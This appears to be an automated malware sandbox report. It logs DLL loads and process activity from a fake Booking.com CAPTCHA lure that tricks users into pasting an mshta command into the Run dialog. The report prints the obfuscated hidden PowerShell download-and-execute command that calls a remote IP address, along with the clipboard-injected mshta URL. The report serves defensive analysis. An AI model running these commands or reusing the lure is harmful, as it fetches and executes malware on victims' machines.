                Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX"
                Source: Yara matchFile source: 00000010.00000002.1645128494.0000020F80402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.1645128494.0000020F8049A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2010937734.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2022674073.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline"

                Persistence and Installation Behavior

                barindex
                Source: screenshotOCR Text: x about:blank x Booking.cam - Partner Hub 2; booking.raombedsrewiews.com/sign-in?op_token =zXJ81EgVvYXVOaCKyAQaUN103Mm91T2QzNk5uN3prM3BpcmgSCWF1dGhvcm16ZRoaaHROcHM6Ly... Booking.com Robot or human ? Check the box to confirm that you're human. Thank You! I'm not a robot reCAPTCHA Privacy - Terms Verification Steps 1. Press Windows Button C + R 2. Press CTRL + V 3. Press Enter ENG p Type here to search SG 28/03/2025
                Source: screenshotOCR Text: x about:blank x Booking.cam - Partner Hub 2; booking.raombedsrewiews.com/sign-in?op_token =zXJ81EgVvYXVOaCKyAQaUN103Mm91T2QzNk5uN3prM3BpcmgSCWF1dGhvcm16ZRoaaHROcHM6Ly... Booking.com Robot or human ? Check the box to confirm that you're human. Thank You! I'm not a robot Privacy - Verification Steps 1. Press Windows Button C + R 2. Press CTRL + V 3. Press Enter ENG p Type here to search SG 28/03/2025
                Source: Chrome DOM: 0.2OCR Text: Booking.com Robot or human ? Check the box to confirm that you're human. Thank You! I'm not a robot reCAPTCHA Privacy - Terms Verification Steps 1 Press Windows Button + R 2 Press CTRL + V 3. Press Enter
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: mshta https://adult-hub1990.cfd/rq3xYUErWsFPbHiX.html #'' I'm human ID505306''
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\toaudqqy.dllJump to dropped file
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
